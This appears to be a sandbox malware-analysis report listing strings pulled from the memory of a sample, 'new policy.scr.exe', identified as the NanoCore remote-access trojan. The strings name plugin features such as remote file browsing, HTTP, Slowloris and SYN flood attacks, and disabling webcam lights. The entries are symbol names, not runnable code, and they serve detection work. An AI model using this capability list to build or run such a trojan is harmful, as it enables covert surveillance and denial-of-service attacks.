Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: Class10gdelegate0_0gclass0_0gstruct0_0gclass1_0gclass2_0gclass3_0class9_0smethod_0type_0contextValue_0string_0ulong_0bool_0gparam_0cultureInfo_0lastInputInfo_0stringBuilder_0resourceManager_0timer_0uintptr_0memoryStatus_0object_0uint_0ushort_0iclientDataHost_0iclientNetworkHost_0iclientAppHost_0GDelegate0GClass0GStruct0Class11gdelegate0_1class1_1smethod_1string_1ulong_1bool_1cultureInfo_1intptr_1object_1uint_1Class1`1IEnumerable`1ContextValue`1IEnumerator`1List`1GClass1Class12Int32class1_2smethod_2ulong_2intptr_2int_2KeyValuePair`2Dictionary`2GClass2Class13class1_3smethod_3GClass3Class14smethod_4Class4Class15method_5Class5Class16method_6Class6Class17method_7Class7Class18method_8Class8Class19method_9Class9<Module>System.IOTvalue__GetFirstRunDataProjectDatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicGetWindowThreadProcessIdGetProcessByIdAddConnectionStateChangedConnectionFailedPipeClosedPipeCreatedget_BytesReceivedSynchronizedCoreCommandSystemCommandConnectionCommandRoundGetMethodmethodNetworkInterfaceStackTraceCreateInstancedefaultInstanceDivideGetHashCodeget_UnicodeAddRangeChangeBuildingHostCacheEndInvokeBeginInvokeIDisposableRuntimeMethodHandleGetModuleHandleRuntimeTypeHandleGetTypeFromHandleGetProcessHandleToSingleAvailablePageFileTotalPageFileset_WindowStyleProcessWindowStyleget_NameGetApplicationExecutableNameGetClientExecutableNameGetRandomFileNameGetFileNameget_FullNameget_ProcessNameGetNameAssemblyNameGetApplicationFriendlyNameGetClientFriendlyNameStackFrameGetFrameDateTimeOneCombineCommandTypeCheckForSyncLockOnValueTypeget_DeclaringTypeNanoCoreMethodBaseApplicationBaseApplicationSettingsBaseDisposeUpdateMulticastDelegateEditorBrowsableStateCompilerGeneratedAttributeGuidAttributeGeneratedCodeAttributeDebuggerNonUserCodeAttributeDebuggableAttributeEditorBrowsableAttributeComVisibleAttributeAssemblyTitleAttributeStandardModuleAttributeHideModuleNameAttributeAssemblyTrademarkAttributeDebuggerHiddenAttributeAssemblyFileVersionAttributeMyGroupCollectionAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeCLSCompliantAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeset_UseShellExecuteByteget_Valueset_ValueLookupPrivilegeValueGetObjectValueGetValueMoveRemoveget_SizeInitializeSizeOfSystem.ThreadingEncodingToStringMathget_ExecutablePathGetTempPathobjAsyncCallbackTimerCallbackcallbackIClientNetworkTotalPhysicalAvailablePhsyicalMarshalDecimalMicrosoft.VisualBasic.MyServices.InternalAvailableVirtualTotalVirtualAvailableExVirtualSystem.ComponentModelHandleConnectionCommandUninstalladvapi32.dllkernel32.dlluser32.dllCoreClientPlugin.dllObjectFlowControlget_Itemset_ItemSystemEnumBooleanget_MetadataTokenOpenProcessTokenGetPublicKeyTokenMinNanoCore.ClientPluginCoreClientPluginGetIsRunningAsAdminApplicationSystem.Net.NetworkInformationUnicastIPAddressInformationSystem.ConfigurationSystem.GlobalizationSystem.ReflectionUnicastIPAddressInformationCollectionIClientNameObject
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_L